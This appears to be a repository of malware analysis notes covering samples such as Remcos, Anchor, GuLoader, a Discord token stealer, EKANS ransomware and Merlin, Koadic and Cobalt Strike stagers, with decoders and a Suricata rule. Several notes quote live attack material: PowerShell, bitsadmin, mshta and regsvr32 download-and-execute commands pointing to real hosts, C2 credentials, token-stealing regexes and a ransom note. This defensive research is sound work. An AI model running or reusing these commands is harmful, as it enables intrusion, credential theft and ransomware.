52 | 00000160: b720 d0cc 1c2e 3c13 0ae2 b566 0c08 7d0a  . ....<....f..}.
53 | 00000170: 2025 96ff 4102 ff45 b3bd 37dc 32fc 0080   %..A..E..7.2...
54 | 00000180: 0539 1b75 66d6 42bb 9081 ba0e 57c0 84b2  .9.uf.B.....W...
55 | 
56 | ```
57 | 
58 | 
59 | XOR decodes to a remcos sample
60 | 
61 | 6befc80135832c3be7e229b682bf7689707b6457ea16b1691313a629f817306a
62 | 
63 | Sample doens't have a SETTINGS resource section which is what most config decoders seems to want that I found. Also there's another index value in the config not accounted for in the JPCERT decoder, need to go through and check what the value is if I get time.
64 | 
65 | Converted a memory based decoder to static and updated it
66 | https://gist.github.com/sysopfb/11e6fb8c1377f13ebab09ab717026c87
67 | 
68 | ```
69 | ['nolim.duckdns.org:4922:blessing1234|', 'oneonebilli', '1', '\x00', '\x01', '\x00', '\x00', '\x00', '\x00', '6', 'r\x00e\x00m\x00c\x00o\x00s\x00.\x00e\x00x\x00e\x00', 'r\x00e\x00m\x00c\x00o\x00s\x00', '\x00', '0', 'Remcos-B0YDF1', '1', '6', 'l\x00o\x00g\x00s\x00.\x00d\x00a\x00t\x00', '\x00', '\x01', '\x00', '10', '\x00', 'wikipedia;solitaire;', '5', '6', 'Screenshots', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '5', '6', 'MicRecords', '\x00', '0', '0', '', '\x00', '\x01', '0', '\x00', '1', 'r\x00e\x00m\x00c\x00o\x00s\x00', 'r\x00e\x00m\x00c\x00o\x00s\x00', '\x00', '\x00', 'E6B7984F3FE9E61F8FA94748A79726CA', '\x00', '10000', '\x00']
70 | ```
71 | 
72 | 
73 | ```
74 | {'Screenshot time': '10', 'Unknown39': 'Disable', 'Hide keylog file': 'Enable', 'Keylog folder': 'r\x00e\x00m\x00c\x00o\x00s\x00', 'Screenshot flag': 'Disable', 'Startup value': 'r\x00e\x00m\x00c\x00o\x00s\x00', 'Mutex': 'Remcos-B0YDF1', 'Keylog file max size': '10000', 'Setup HKCU\\Run': 'Enable', 'Host:Port:Password': 'nolim.duckdns.org:4922:blessing1234|', 'Connect delay': '0', 'Setup HKLM\\Run': 'Disable', 'Keylog flag': '1', 'Unknown55': 'Disable', 'Unknown50': 'Disable', 'Unknown51': 'Disable', 'Unknown52': 'E6B7984F3FE9E61F8FA94748A79726CA', 'Keylog crypt': 'Disable', 'Audio record time': '5', 'Copy file': 'r\x00e\x00m\x00c\x00o\x00s\x00.\x00e\x00x\x00e\x00', 'Unknown13': '0', 'Unknown32': 'Disable', 'Unknown33': 'Disable', 'Unknown31': 'Disable', 'Unknown34': 'Disable', 'Unknown35': 'Disable', 'Hide file': 'Disable', 'Install flag': 'Disable', 'Take Screenshot option': 'Disable', 'Keylog path': 'AppData', 'Assigned name': 'oneonebilli', 'Audio folder': 'MicRecords', 'Delete file': 'Disable', 'Setup HKLM\\Winlogon\\Shell': 'Disable', 'Mouse option': 'Disable', 'Connect interval': '1', 'Take screenshot title': 'wikipedia;solitaire;', 'Keylog file': 'l\x00o\x00g\x00s\x00.\x00d\x00a\x00t\x00', 'Take screenshot time': '5', 'Setup HKLM\\Explorer\\Run': 'Disable', 'Copy folder': 'r\x00e\x00m\x00c\x00o\x00s\x00', 'Unknown46': 'Disable', 'Unknown43': 'Disable', 'Unknown42': '', 'Unknown40': '0', 'Unknown47': '1', 'Screenshot path': 'AppData', 'Unknown45': '0', 'Unknown44': 'Enable', 'Setup HKLM\\Winlogon\\Userinit': 'Disable', 'Install path': 'AppData', 'Unknown53': 'Disable', 'Audio path': 'AppData', 'Screenshot crypt': 'Disable', 'Screenshot file': 'Screenshots', 'Unknown29': 'Disable'}
75 | 
76 | ```
77 | 


--------------------------------------------------------------------------------
/546bf4fc684c5d1e17b204a28c795a414124335b6ef7cbadf52ae8fbadcb2a4a.md:
--------------------------------------------------------------------------------
 1 | # Sample
 2 | 546bf4fc684c5d1e17b204a28c795a414124335b6ef7cbadf52ae8fbadcb2a4a
 3 | 
 4 | This is an Anchor DNS variant, but also includes code for making ICMP echo requests.
 5 | 
 6 | The request uses a hardcoded 'hanc' string  in the ICMP echo request, the last two bytes appear to be the command flag, similar to the DNS variant a command can be downloaded or even an entire file in small chunks.
 7 | 
 8 | Example ICMP packet:
 9 | 
10 | ```
11 | <Ether  dst=11:11:00:11:04:11 src=22:22:00:22:22:22 type=IPv4 |<IP  version=4 ihl=5 tos=0x50 len=50 id=60659 flags= frag=0 ttl=53 proto=icmp chksum=0xa13d src=9.40.15.7 dst=192.168.100.200 |<ICMP  type=echo-reply code=0 chksum=0xf228 id=0x1 seq=0x4 |<Raw  load='hanc3496b937cead1870\x08\x00' |>>>>
12 | 
13 | ```
14 | 
15 | Suricata rule:
16 | 
17 | ```
18 | alert icmp $HOME_NET any -> $EXTERNAL_NET any (msg:"Anchor ICMP"; itype:8; content:"hanc"; depth:4; classtype:trojan-activity; sid:9000010; rev:4;)
19 | ```
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 sysopfb / Jason Reaves
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # open_mal_analysis_notes
2 | open source malware analysis and research notes dump
3 | 


--------------------------------------------------------------------------------
/d2cd734c7d08fe8a5f1f65e319a3204f0c8b46ea224f1b90b3c8a6d0c6de586a.md:
--------------------------------------------------------------------------------
 1 | Email forward chain:
 2 | 60e1212e3f5b039d10d0c40d77ea82d6bf679555553e36efc16894d7ba38e301
 3 | 
 4 | 
 5 | ```
 6 | From: Redgate - Frankie <redgate@vip.163.com> 
 7 | Sent: Tuesday, March 17, 2020 10:23 PM
 8 | To: Info-Proces__substg1.0_0F030102
 9 | sChemical <Info-ProcessChemical@tkinet.com>
10 | Subject: RE: RE: PO (COVID-19)
11 | Dear info-processchemical,
12 | Please find attached our stamped and signed PO
13 | Please send me your Performa invoice in order to make the bank transfer this week.
14 | PROTEGE-TE SEMPRE A TI E AOS OUTROS CONTRA O #CORONAVIRUS!
15 | Best Regards
16 | RCL - Frankie
17 | ****************************************************
18 | REDGATE (H.K.) TRADING DEVELOPMENT CO., LTD.
19 | Tel: 8620 - 3730 3456
20 | Fax: 8620 - 3730 3466
21 | Mobile: 86 - 137 5180 1340
22 | E-mail: redgate@vip.163.com <mailto:redgate@vip.163.com> 
23 | ```
24 | 
25 | 
26 | Will drop a GuLoader pretending to be a batch file: d2cd734c7d08fe8a5f1f65e319a3204f0c8b46ea224f1b90b3c8a6d0c6de586a
27 | 
28 | VBCrypter is still the same, delivery:
29 | hxxps://drive.google[.]com/uc?export=download&id=1xz02BCj0obD4UPgs0CMtu_6GXxCEYXzS
30 | 
31 | suspect key 522 bytes '43a9794c90c36e6c2eea70de1c62075d182cab716446a092026de603f02a3982ecf3225238c91773d63519e581adb0a8c07654770d4d4998aab88f0a5530e28994fa869de1147bbd7e3bc12f29b358ae697dfc7eb597f1e353be3710fd378ad33d002fa3891a24c427426a36d2fe01f91183a5c85e9e9ae9fb09e05ba68133dae54bd7ee3221cc0e8c8c123c7a0465ff76ce4dcf06e842f0600f44614e88db244a5180f4da6b75153493bb87230b0e061ed4f6196befeb3a0816ed68f78e842bf25828fb3f721d1bdddd97c1ff8aea84fb538e5447298375e594c9e6d30d6165cfd605791bacfa9ab918400ca890938ba359375af0742c7b8d9b72ed7c13c5b077ddad80c4f7a2a0621ea41250973b914c60dfa5987ad4c636a11a37245e6eb6202756866cfd4ba70a694d19b5e1e4dcf4aa88ab41817dccdeecc33e896416bdc82ebad11548aff1b36ff5635de88ce29db130b2e9cb251787f26b44316bbf07713463d7bd4e58f85b769e6a0632352d45b7d9fc92d2ce1d2f3d148fdab5670e197f0b2266550042c0c04670ae399933aa0281033a1c76249443789582bc10587e85b4280e9fa94968c7efbb573f423a52082a4d9f231f6e3c4a219c2bc2b85f268c5c2f73a6514f111197c1ff8aea84fb538e5447298375e594c9e6d30d6165cfd605791bacfa9ab918400ca890938ba359375af0742c7b8d9b72ed7c13c5b077ddad80c4f7a2a0621e'
32 | 
33 | Decoded payload:
34 | 325488aeb875af06e07f609aa1d1a4357a125c714bb3d143da70ee18887f7441
35 | 
36 | 
37 | Appears to be Agent Tesla
38 | 


--------------------------------------------------------------------------------
/dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5.md:
--------------------------------------------------------------------------------
 1 | dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5
 2 | 
 3 | 
 4 | ```
 5 | centralcity.brazilsouth.cloudapp[.]azure[.]com 191.239.244.78
 6 | ```
 7 | 
 8 | 
 9 | 
10 | checks for 
11 | ```
12 | Roaming\discord
13 | Roaming\discordptb
14 | Roaming\discordcanary
15 | ```
16 | 
17 | If found checks files in Local Storage\leveldb\ for tokens by reading files and using regex patterns
18 | 
19 | ```
20 | mfa\.[\w-]{84}
21 | [\w-]{24}\.[\w-]{6}\.[\w-]{27}
22 | ```
23 | 
24 | 
25 | Sends data to
26 | 
27 | ```
28 | hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/brancao
29 | ```
30 | 
31 | Another sample:
32 | c16c3e17fa5eb849033825b24c813242be3fcd9e1b48ea52c816a9b0b8d6e856
33 | 
34 | ```
35 | hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/wl
36 | ```
37 | 
38 | Another sample:
39 | ced418253024655d11588b97aba24aad3e80d215a1ed4ca1f7a8bf8ecf623216
40 | 
41 | ```
42 | hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/tokyo
43 | ```
44 | 
45 | 
46 | C2 traffic would look like this
47 | 
48 | ```
49 | GET /brancao HTTP/1.1
50 | Host: centralcity.brazilsouth.cloudapp[.]azure[.]com
51 | User-Agent: Go-http-client/1.1
52 | Content-Length: 23
53 | Sharkflow: mfa.012345678901234567890123456789012345678901234567890123456789012345678901234567891234
54 | Accept-Encoding: gzip
55 | 
56 | {"foda-se": "kkkkkkkk"}
57 | 
58 | ```
59 | 


--------------------------------------------------------------------------------
/e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60.md:
--------------------------------------------------------------------------------
  1 | Snake sample from VK https://twitter.com/VK_Intel/status/1214333066245812224
  2 | 
  3 | Strings are XOR encoded, decoding function looks pretty static except for the offsets and lengths
  4 | 
  5 | 
  6 | One of the first things decoded is an onboard public key which is common for ransomware that will use a public key to encrypt a symmetric key which is used to encrypt a file
  7 | 
  8 | ```
  9 | Python>data1 = bytearray(GetManyBytes(0x608c5b, 0x1aa))
 10 | Python>data2 = bytearray(GetManyBytes(0x608e05, 0x1aa))
 11 | Python>for i in range(len(data1)):
 12 | Python>  data1[i] ^= data2[i]
 13 | Python>
 14 | Python>data1
 15 | -----BEGIN RSA PUBLIC KEY-----
 16 | MIIBCgKCAQEAyQ+M5ve829umuy9+BSsUX/krgdF83L3m8/uxRvKX5EZbSh1+buON
 17 | ZYr5MjfhrdiOGnrbB1j0Fy31U/uzvWcy7VvK/zcsO/5aAhujhHB/qMAVpZ8zT5BB
 18 | ujT1Bvsith/BXgtM99MixD8oZ67VDZaRM9TPE89WuAjnaBZORrk48wFcn1DOAAHD
 19 | Z9z9komtqIH1fm3Y0Q6P76nUscLsYOme082L217Th/lTMoqqs4cF2rn9O9Vp4V9U
 20 | aCs4XVxGSpcuqbIscfpf0cm44P2eOEk+sbZdahO9C6fezt7YF4OCJ4Vz3qqMD6z4
 21 | +6d7FRxUu6k3Te2T2bWBZnsDO30pYFi/gwIDAQAB
 22 | -----END RSA PUBLIC KEY-----
 23 | ```
 24 | 
 25 | 
 26 | Since the decoding function is pretty static we can regex it out and decode all the strings statically
 27 | 
 28 | ```python
 29 | import re
 30 | import sys
 31 | import pefile
 32 | import struct
 33 | import binascii
 34 | 
 35 | 
 36 | data = open(sys.argv[1], 'rb').read()
 37 | 
 38 | pe = pefile.PE(data=data)
 39 | base = pe.OPTIONAL_HEADER.ImageBase
 40 | memdata = pe.get_memory_mapped_image()
 41 | 
 42 | t = re.findall('''8d05......0089442404c7442408......00e8....eeff8b44240c.{34,70}89542404c7442408......00e8''', binascii.hexlify(data))
 43 | 
 44 | all = []
 45 | 
 46 | for val in t:
 47 | 	off1 = struct.unpack_from('<I', binascii.unhexlify(val)[2:])[0] - base
 48 | 	l = struct.unpack_from('<I', binascii.unhexlify(val)[14:])[0]
 49 | 	off2 = struct.unpack_from('<I', binascii.unhexlify(val)[-17:])[0] - base
 50 | 	
 51 | 	d1 = bytearray(memdata[off1:off1+l])
 52 | 	d2 = bytearray(memdata[off2:off2+l])
 53 | 
 54 | 	for i in range(len(d1)):
 55 | 		d1[i] ^= d2[i]
 56 | 	all.append(str(d1))
 57 | 	print(d1)
 58 | ```
 59 | 
 60 | 
 61 | Decoded strings:
 62 | ```
 63 | EKANS
 64 | kernel32.dll
 65 | CreateMutexW
 66 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
 67 | already encrypted!
 68 | 
 69 | worker %s started job %s
 70 | 
 71 | error encrypting %v : %v
 72 | 
 73 | There can be only one
 74 | 
 75 | -----BEGIN RSA PUBLIC KEY-----
 76 | MIIBCgKCAQEAyQ+M5ve829umuy9+BSsUX/krgdF83L3m8/uxRvKX5EZbSh1+buON
 77 | ZYr5MjfhrdiOGnrbB1j0Fy31U/uzvWcy7VvK/zcsO/5aAhujhHB/qMAVpZ8zT5BB
 78 | ujT1Bvsith/BXgtM99MixD8oZ67VDZaRM9TPE89WuAjnaBZORrk48wFcn1DOAAHD
 79 | Z9z9komtqIH1fm3Y0Q6P76nUscLsYOme082L217Th/lTMoqqs4cF2rn9O9Vp4V9U
 80 | aCs4XVxGSpcuqbIscfpf0cm44P2eOEk+sbZdahO9C6fezt7YF4OCJ4Vz3qqMD6z4
 81 | +6d7FRxUu6k3Te2T2bWBZnsDO30pYFi/gwIDAQAB
 82 | -----END RSA PUBLIC KEY-----
 83 | 
 84 | bad pem
 85 | 
 86 | %v
 87 | 
 88 | %v
 89 | 
 90 | WbemScripting.SWbemLocator
 91 | %v
 92 | 
 93 | %v
 94 | 
 95 | ConnectServer
 96 | %v
 97 | 
 98 | ExecQuery
 99 | SELECT * FROM Win32_ShadowCopy
100 | %v
101 | 
102 | Count
103 | %v
104 | 
105 | ItemIndex
106 | %v
107 | 
108 | ID
109 | %v
110 | 
111 | Delete_
112 | %v
113 | 
114 | \temp
115 | total lengt: %v
116 | 
117 | .docx
118 | .dll
119 | .exe
120 | .sys
121 | .mui
122 | .tmp
123 | .lnk
124 | .config
125 | .manifest
126 | .tlb
127 | .olb
128 | .blf
129 | .ico
130 | .regtrans-ms
131 | .devicemetadata-ms
132 | .settingcontent-ms
133 | .bat
134 | .cmd
135 | .ps1
136 | desktop.ini
137 | iconcache.db
138 | ntuser.dat
139 | ntuser.ini
140 | ntuser.dat.log1
141 | ntuser.dat.log2
142 | usrclass.dat
143 | usrclass.dat.log1
144 | usrclass.dat.log2
145 | bootmgr
146 | bootnxt
147 | windir
148 | SystemDrive
149 | :\$Recycle.Bin
150 | :\ProgramData
151 | :\Users\All Users
152 | :\Program Files
153 | :\Local Settings
154 | :\Boot
155 | :\System Volume Information
156 | :\Recovery
157 | \AppData\
158 | ntldr
159 | NTDETECT.COM
160 | boot.ini
161 | bootfont.bin
162 | bootsect.bak
163 | desktop.ini
164 | ctfmon.exe
165 | iconcache.db
166 | ntuser.dat
167 | ntuser.dat.log
168 | ntuser.ini
169 | thumbs.db
170 | .+\\Microsoft\\(User Account Pictures|Windows\\(Explorer|Caches)|Device Stage\\Device|Windows)\\
171 | \
172 | 
173 | \
174 | files: %v
175 | priority files: %v
176 | 
177 | priorityFiles: %v
178 | 
179 | Toatal files: %v
180 | 
181 | --------------------------------------------
182 | 
183 | | What happened to your files? 
184 | 
185 | --------------------------------------------
186 | 
187 | We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more -
188 | 
189 | all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry!
190 | 
191 | You can still get those files back and be up and running again in no time. 
192 | 
193 | 
194 | ---------------------------------------------
195 | 
196 | | How to contact us to get your files back?
197 | 
198 | ---------------------------------------------
199 | 
200 | The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network. 
201 | 
202 | Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with
203 | 
204 | better cyber security in mind. If you are interested in purchasing the decryption tool contact us at %s
205 | 
206 | 
207 | -------------------------------------------------------
208 | 
209 | | How can you be certain we have the decryption tool?
210 | 
211 | -------------------------------------------------------
212 | 
213 | In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets).
214 | 
215 | We will send them back to you decrypted.
216 | Fix-Your-Files.txt
217 | public
218 | systemdrive
219 | pub: %v
220 | root: %v
221 | 
222 | \Desktop\
223 | \
224 | Global\
225 | ccflic0.exe
226 | ccflic4.exe
227 | healthservice.exe
228 | ilicensesvc.exe
229 | nimbus.exe
230 | prlicensemgr.exe
231 | certificateprovider.exe
232 | proficypublisherservice.exe
233 | proficysts.exe
234 | erlsrv.exe
235 | vmtoolsd.exe
236 | managementagenthost.exe
237 | vgauthservice.exe
238 | epmd.exe
239 | hasplmv.exe
240 | spooler.exe
241 | hdb.exe
242 | ntservices.exe
243 | n.exe
244 | monitoringhost.exe
245 | win32sysinfo.exe
246 | inet_gethost.exe
247 | taskhostw.exe
248 | proficy administrator.exe
249 | ntevl.exe
250 | prproficymgr.exe
251 | prrds.exe
252 | prrouter.exe
253 | prconfigmgr.exe
254 | prgateway.exe
255 | premailengine.exe
256 | pralarmmgr.exe
257 | prftpengine.exe
258 | prcalculationmgr.exe
259 | prprintserver.exe
260 | prdatabasemgr.exe
261 | preventmgr.exe
262 | prreader.exe
263 | prwriter.exe
264 | prsummarymgr.exe
265 | prstubber.exe
266 | prschedulemgr.exe
267 | cdm.exe
268 | musnotificationux.exe
269 | npmdagent.exe
270 | client64.exe
271 | keysvc.exe
272 | server_eventlog.exe
273 | proficyserver.exe
274 | server_runtime.exe
275 | config_api_service.exe
276 | fnplicensingservice.exe
277 | workflowresttest.exe
278 | proficyclient.exe
279 | vmacthlp.exe
280 | msdtssrvr.exe
281 | sqlservr.exe
282 | msmdsrv.exe
283 | reportingservicesservice.exe
284 | dsmcsvc.exe
285 | winvnc4.exe
286 | client.exe
287 | collwrap.exe
288 | bluestripecollector.exe
289 | ```
290 | 


--------------------------------------------------------------------------------
/ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c.md:
--------------------------------------------------------------------------------
 1 | ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c - TAX.xlsb
 2 | https://app.any.run/tasks/1c7a79e3-a201-43d3-9f4f-693d2049355c/
 3 | 
 4 | 
 5 | ```
 6 | cmd.exe /c cd c:\&&mkdir Intel
 7 | ncmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
 8 | 9cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat
 9 | jcmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
10 | jcmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
11 | Fcmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe
12 | cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&regsvr32 /s mery.dll,Run https://38.132.124.172:443/
13 | npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))
14 | opowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))
15 | "mshta http://37.72.175.188:80/home
16 | :regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj
17 | 
18 | ```
19 | 
20 | mer.dll was Merlin DLL agent - golang
21 | fc0bece7ca5c54b7a2032bc0cca2b65f4c20cb08b54a9acca7df037b9d30d2c4
22 | 
23 | below is Merlin framework C2 - easy signature on empty subject and issuer for self signed
24 | ```
25 | # openssl s_client -connect 38.132.124.172:443
26 | CONNECTED(00000003)
27 | Can't use SSL_get_servername
28 | depth=0 
29 | verify error:num=18:self signed certificate
30 | verify return:1
31 | depth=0 
32 | verify return:1
33 | ---
34 | Certificate chain
35 |  0 s:
36 |    i:
37 | ---
38 | Server certificate
39 | -----BEGIN CERTIFICATE-----
40 | MIIEwDCCAqigAwIBAgIRALEpO/ZeDFiIVssqebRuwb8wDQYJKoZIhvcNAQELBQAw
41 | ADAeFw0xOTEyMTQxODMwNThaFw0yMTEyMTQxODMwNThaMAAwggIiMA0GCSqGSIb3
42 | DQEBAQUAA4ICDwAwggIKAoICAQDEOt7Jsc5Ey+UjNR3QXZI17jCORGPcMnDGHEfP
43 | 5DBGPmvw/DDnf8I/Jv3Bi0zeTIDprRHnO9B8uS96mBN5iObPaiaCO9z7SDYjPyYJ
44 | KowztNd9HvAK9dr613iYhAitrFJYqKv/1oFvwqPEYp/FsXsm1+ewxioWxR0xtS8z
45 | JvVzjal+DF4HeViyAMpUSh29P9EjwT+bSfyE8kcPd/uYzOoOL2y/NoBX9QGJto6J
46 | XZ7vl1sLEsk9afBA99GMDbXe2ETPh5/8fDt1B11Aabj96gZNbI7kSVALM0x01no4
47 | OlAyuHG9rVbYoDdtM1MT8oYYpO7RYlA5QW+uo4tcxYfEn4OhUDvhjCzWUmE50KmO
48 | c3c8Ukpn4evwf5rjRonDW4oysKx13i8UCkx4xzxVPZSHxIG30JEiRFH64MOwtF74
49 | hywd07qGPS2KSjPyy6gjRUDEkhxZIHKfnmGc0mmnkDEwtD/1HoHybGCQCQovJuy5
50 | mT4wEV9Xjs4jwoOxBfP+xYPp4Rv0moEgIVkQFVA2t19j3baPb712arTFR2469tD5
51 | 9NErRN0M9Z/qbsZIv+pSzspl5IJme5u48RB0Xu0phoahorU3u/e48cAvpjfOk+Mx
52 | 8ymUOvQhfE9FF8ZndTzUm1va8BrMil1k1M6Mv49UNCrv6YkQ3GLY5eG7RnXB95Ej
53 | RgEJ7wIDAQABozUwMzAOBgNVHQ8BAf8EBAMCAqQwEwYDVR0lBAwwCgYIKwYBBQUH
54 | AwEwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEArJBO2dtW2LL4RKSr
55 | MHTyuFaLoQY+GkqJKYv4Ww2lar+x2orOP9HBzlFXlWLlBhh/yrvRoznWLeAvzJ1h
56 | Fb3Tl1rxErI1TJl+8uLG1aTJujz1qoibh+VdESvvdQVEW86ZmfyHCecAVu+I11ur
57 | 7gpmEY1atio3Fo0dvGsMECvYBn+lmBQD186QKTASNFD/yzY8cDqf2dN4kbMkgiLt
58 | XAnRa9K0kgEgpHY+E6FFSjf+Ax7OAMg7PPbdM3i/hygL2xiDbDNfpGQX20gUCfVg
59 | c1MXfGEiZiJphK7FySHH+zwbXuipM3Rnm7/qVvravmnVqMdQviqs4xg96MVwWL9R
60 | 8isZ1u5Je8DSGcXqhMl/ew9G22vJeLYPClUWAuBEYQ821gnliOEEy4xl59MMRYjn
61 | anV9IsEUMhkoFlQA9ifEyhKQPMbVOXy7zzWU+H3AzDOzkp2YfvmgLNhazRxn9mTq
62 | 1zzyWWDOn+hjSpz7ncgQotUIQppbenz8Cv0nH7dtANPgG6Vvp9+AexQTkhZLItff
63 | XLr4FizoRkdzkspffKio2u4HMPpw/TEiD/bC3qcOvLbau+KwJWkURSKp2PCgEJBV
64 | 9RgqkizUhitkip9MiWbqUEMHKBlS1dsRHBaOB6TeFVpJBMAQ+sJsNlax/G3YdLaj
65 | z4VAo+VAFaOAwJ0eH4lbRR7kcA8=
66 | -----END CERTIFICATE-----
67 | 
68 | ```
69 | 
70 | hxxp://37.72.175[.]188:443/index
71 | 
72 | is koadic backdoor framework - script based with python server
73 | 
74 | 
75 | home - 276e409e3371f1b3d905737be03c99ed5b3b4519a03db5aec21b609d488ae06e
76 | 
77 | index - d369d50b3447d354bc6d69ffb45c2e57dc149ed58946bcfe4cf567806c1676b3
78 | 
79 | These are both koadic stagers from data/stager/stdlib.js with different sessions for handing off
80 | 
81 | hxxp://37.72.175[.]188:80/home?4IZ9S56AA4=e92f3574b16a4a0da0f15b3feca6f16f;N6URWPF5YH=
82 | 
83 | hxxp://37.72.175[.]188:443/index?6S2YBE0VOY=a9136a756c1e4ab39a0d737c0dbec493;KWYS8DF1UJ=
84 | 


--------------------------------------------------------------------------------
/f8c94e76f4d756924bf929b32f85158bc81911ce4a606af67e37460405e0ad3f.md:
--------------------------------------------------------------------------------
  1 | # Sample
  2 | 
  3 | f8c94e76f4d756924bf929b32f85158bc81911ce4a606af67e37460405e0ad3f
  4 | 
  5 | 
  6 | # Characteristics
  7 | * Golang
  8 | * 64 bit Windows
  9 | * VT Detections 8/72
 10 | 
 11 | # Execution Overview
 12 | 
 13 | Sample immediately copies over a blob of data that will be single byte XOR decoded
 14 | 
 15 | ```python
 16 | Python>a = 0x49a620
 17 | Python>for i in range(0x3a0):
 18 | Python>  t = Byte(a+i)
 19 | Python>  t ^= 0x5d
 20 | Python>  PatchByte(a+i, t)
 21 | ```
 22 | 
 23 | 
 24 | The XOR decoded data is metasploit shellcode commonly used as a stager for loading meterpreter or cobaltstrike. 
 25 | 
 26 | Downloading next layer:
 27 | 
 28 | ```
 29 | > GET /xn1F HTTP/1.1
 30 | > Host: 106.53.232.176
 31 | > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
 32 | 
 33 | ```
 34 | 
 35 | Server uses a fake jquery cert
 36 | 
 37 | ```
 38 | *  subject: C=US; ST=US; L=California; O=jQuery; OU=Certificate Authority; CN=jquery.com
 39 | *  issuer: C=US; ST=US; L=California; O=jQuery; OU=Certificate Authority; CN=jquery.com
 40 | *  SSL certificate verify result: self signed certificate (18), continuing anyway.
 41 | 
 42 | ```
 43 | 
 44 | Downloaded file xn1F:
 45 | beb59218a17324f3ce10a4416a5d4a8f9a2ba649f0ba36d6d4f6de610bd2262d
 46 | 
 47 | This data will be directly executed, the bytes on top are a self decoding loop for decoding beacon which will then perform reflective loading to load itself.
 48 | 
 49 | ```
 50 | # rasm2 -D -b 64 -k windows "fc48 83e4 f0eb 335d 8b45 0048 83c5 048b4d00 31c1 4883 c504 558b 5500 31c2 89550031 d048 83c5 0483 e904 31d2 39d1 7402ebe7 58fc 4883 e4f0 ffd0 e8c8 ffff ff16f363 5d16 0960 5d5b a922 0f0e e1ab ea46"
 51 | 0x00000000   1                       fc  cld
 52 | 0x00000001   4                 4883e4f0  and rsp, 0xfffffffffffffff0
 53 | 0x00000005   2                     eb33  jmp 0x3a
 54 | 0x00000007   1                       5d  pop rbp
 55 | 0x00000008   3                   8b4500  mov eax, dword [rbp]
 56 | 0x0000000b   4                 4883c504  add rbp, 4
 57 | 0x0000000f   3                   8b4d00  mov ecx, dword [rbp]
 58 | 0x00000012   2                     31c1  xor ecx, eax
 59 | 0x00000014   4                 4883c504  add rbp, 4
 60 | 0x00000018   1                       55  push rbp
 61 | 0x00000019   3                   8b5500  mov edx, dword [rbp]
 62 | 0x0000001c   2                     31c2  xor edx, eax
 63 | 0x0000001e   3                   895500  mov dword [rbp], edx
 64 | 0x00000021   2                     31d0  xor eax, edx
 65 | 0x00000023   4                 4883c504  add rbp, 4
 66 | 0x00000027   3                   83e904  sub ecx, 4
 67 | 0x0000002a   2                     31d2  xor edx, edx
 68 | 0x0000002c   2                     39d1  cmp ecx, edx
 69 | 0x0000002e   2                     7402  je 0x32
 70 | 0x00000030   2                     ebe7  jmp 0x19
 71 | 0x00000032   1                       58  pop rax
 72 | 0x00000033   1                       fc  cld
 73 | 0x00000034   4                 4883e4f0  and rsp, 0xfffffffffffffff0
 74 | 0x00000038   2                     ffd0  call rax
 75 | 0x0000003a   5               e8c8ffffff  call 7
 76 | 0x0000003f   1                       16  invalid
 77 | 
 78 | ```
 79 | 
 80 | The decoding gets the address of the encoded data by performing a jump and call chain. This will push the address of the data after the call instruction onto the stack, next the dword value XOR key and XOR encoded size value is retrieved. Then the XOR decoding is done, the key ends up being XORd by the cleartext dword every iteration.
 81 | 
